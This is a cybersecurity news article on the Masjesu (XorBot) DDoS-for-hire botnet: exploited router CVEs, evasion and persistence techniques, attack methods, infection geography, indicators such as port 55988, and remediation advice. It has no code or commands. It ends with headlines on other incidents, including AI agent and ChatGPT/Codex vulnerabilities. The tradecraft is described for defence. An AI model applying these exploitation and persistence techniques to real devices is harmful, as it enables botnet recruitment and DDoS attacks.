Masjesu Botnet: The Stealthy DDoS-for-Hire Service Quietly Hijacking IoT Devices Since 2023 — Now Hitting 300 Gbps - CyberTimes

TL;DR — 15 Second Read

→Masjesu (also tracked as XorBot) is a commercially operated DDoS-for-hire botnet active since 2023, advertised openly on Telegram with documented attack capacity of 290 to 300 Gbps
→It targets routers and IoT devices from D-Link, Netgear, TP-Link, Huawei, and others — primarily using known CVEs and default credentials, with Vietnam accounting for nearly half of all infected devices
→Unlike most botnets, Masjesu deliberately avoids US Department of Defense IP ranges and other sensitive allocations to stay under the law enforcement radar — prioritising long-term survival over maximum impact
→The malware supports 12+ DDoS attack methods, uses multi-XOR encryption to hide C2 data, and renames itself to mimic system components — making detection and removal significantly harder

Severity🟠 HIGH

CVSS Score8.1/10

ExploitedYes — active

Fix StatusCheck required

Owners of home and small business routers and IoT devices from D-Link, Netgear, TP-Link, Huawei, GPON routers, MVPower DVRs, and devices with UPnP services exposed — particularly older unpatched models running default or weak credentials. Organisations in Vietnam, Brazil, India, Iran, Kenya, and Ukraine have the highest concentration of infected devices. Businesses that could be targeted by DDoS attacks purchased through Masjesu's Telegram service are also at risk.

Trellix ARC researchers have published a detailed analysis of Masjesu — a commercially operated DDoS-for-hire botnet that has been quietly building its infrastructure since early 2023 while deliberately avoiding the aggressive expansion strategies that get botnets noticed and taken down. Also tracked as XorBot, Masjesu targets home and small business routers and IoT devices across multiple architectures, recruits paying customers through a bilingual Telegram channel, and has demonstrated attack capacity of approximately 290 to 300 Gbps. What distinguishes this botnet from the cybersecurity threat landscape's more notorious players is its operational philosophy — patience over scale, stealth over speed, and long-term survival over short-term revenue. The botnet has been operational for over three years and remains active in 2026, representing a mature and evolving commercial DDoS infrastructure that has outlasted many of its louder contemporaries.

Affected products

·D-Link routers — multiple models targeted via CVE-2014-8361 and others
·Huawei routers — CVE-2017-17215 exploited for propagation
·TP-Link routers — CVE-2023-1389 among exploits used
·Netgear routers — multiple models affected
·GPON routers — exploited via known vulnerabilities
·MVPower DVRs — targeted for recruitment into botnet
·Any IoT device with UPnP services exposed or running default credentials

How to Fix

Step-by-step remediation

The technical evasion capabilities Trellix ARC documented make Masjesu notably harder to detect and remove than simpler IoT malware. Sensitive strings including C2 domains, IPs, and paths are stored in an encrypted lookup table using a multi-XOR routine and only decrypted at runtime — making static IOC extraction from captured samples unreliable. The malware renames its executable to mimic legitimate system components, forks a new process, creates a cron job for persistence, and runs as a background daemon. It kills wget, curl, and sshd processes on infected devices to prevent other malware from competing for the same host and to block remote administrators from regaining access. The C2 architecture has evolved from a single domain with a fallback IP to multiple domains with backup addresses, improving resilience against individual domain takedowns. The botnet supports seven hardware architectures — i386, MIPS, ARM, SPARC, PPC, 68K (Motorola 68000), and AMD64 — covering essentially the entire range of IoT and embedded device hardware in use globally.

What happened

Masjesu operates on a fundamentally different philosophy than most IoT botnets. Where Mirai and its variants pursued explosive growth and maximum attack scale, Masjesu's operators have consistently prioritised operational security and long-term survival. The most telling evidence of this approach is their deliberate policy of avoiding blocklisted IP ranges — including US Department of Defense network allocations — that would flag their scanning and infection activity to organisations most likely to respond with law enforcement referrals. This is not carelessness avoidance. It is calculated restraint from a commercially motivated threat actor that needs its infrastructure to keep running.

Real-World Impact

The botnet has been active since at least 2023 under the XorBot identity, first documented by NSFOCUS targeting Intelbras cameras and routers from Netgear, TP-Link, and D-Link. As the device count grew, operators pivoted to commercial operations — launching a Telegram channel under the Masjesu brand to advertise DDoS-for-hire services. An earlier channel with over 2,000 subscribers was removed, and a new bilingual channel in Chinese and English launched in February 2025 now hosts rental details, feature updates, and performance screenshots for prospective buyers. The network security threat it represents is significant — observed attack capacity of approximately 290 to 300 Gbps was documented in October 2025 from an ACK flood demonstration, and the botnet supports 12 or more distinct DDoS attack methods including TCP floods, UDP floods, ICMP floods, GRE and OSPF protocol floods, Valve Source Engine query floods, and HTTP floods that simulate browser-like traffic using randomised headers and spoofed IPs.

Technical Details

Geographic distribution of infected devices is heavily weighted toward Vietnam, which contributes close to half of all observed Masjesu traffic. Brazil, India, Iran, Kenya, and Ukraine contribute the remainder. The spread across diverse ASNs — many ISP allocations rather than VPS or cloud infrastructure — provides Masjesu with the same digital security advantage that residential proxy botnets exploit: attack traffic that originates from legitimate home and small business connections looks like normal internet traffic and is significantly harder to block with static IP-based filtering rules.

🛡️ Prevention Tips

Masjesu's survival since 2023 is a direct consequence of the IoT security problem that the data security community has documented for a decade — billions of network-connected devices running unpatched firmware with default credentials, never updated, never monitored, and never replaced even after reaching end-of-life. The practical prevention is the same as it has always been: update firmware, change default passwords, disable unnecessary services like UPnP, and replace end-of-life hardware. The difference now is that an unpatched router does not just create a security risk for its owner — it becomes a weapon in a commercially operated DDoS service that any paying customer can direct at any target. For organisations that may be targets of purchased DDoS attacks, deploy upstream DDoS mitigation services before an attack occurs. Reactive mitigation after a 290 Gbps flood has already hit your infrastructure is significantly harder and more expensive than pre-positioned protection.

FAQs

How do I know if my router is infected with Masjesu?

Check for unexpected processes running in your device's process list, particularly processes in /tmp/ or system directories with names that mimic legitimate system components. Check for a TCP listener on port 55988 — Masjesu sets this up on infected devices for operator access. Unusual outbound network connections to unfamiliar domains, especially at regular intervals suggesting C2 beacon traffic, are also indicators. The most reliable check is ensuring your firmware is fully patched and your admin credentials are not default.

My router model is on Masjesu's target list — what do I do?

Update firmware immediately, change admin credentials, and disable UPnP. If your model is end-of-life and no longer receiving firmware updates, replace it. Running an unpatched router means the same vulnerabilities Masjesu exploits will remain permanently open regardless of any other security measures you take.

Why is Vietnam the largest source of Masjesu-infected devices?

Vietnam has a large and rapidly growing internet user population with significant adoption of consumer routers and IoT devices, many of which run older firmware or ship with default credentials that users do not change. The combination of high device density and lower average firmware update rates makes any country with similar characteristics a prime botnet recruitment target — Vietnam happens to have the highest concentration in Masjesu's current infrastructure.

CVE-2026-34040: Docker AuthZ Plugin Bypass Lets Attackers Escape Containers and Gain Full Host Access — AI Agents Can Trigger It Automatically

php webshell · cookie controlled

Microsoft Exposes Cookie-Controlled PHP Web Shells That Resurrect Themselves via Cron — A New Stealthy Linux Persistence Technique

openai · chatgpt

OpenAI Patches Two Critical Vulnerabilities: ChatGPT Data Exfiltration via Side Channel and Codex Command Injection Exposing GitHub Tokens

north korea · dprk

$285 Million Drift Hack: North Korea's UNC4736 Spent Six Months Building Trust Before Draining Everything in 10 Seconds

npm · strapi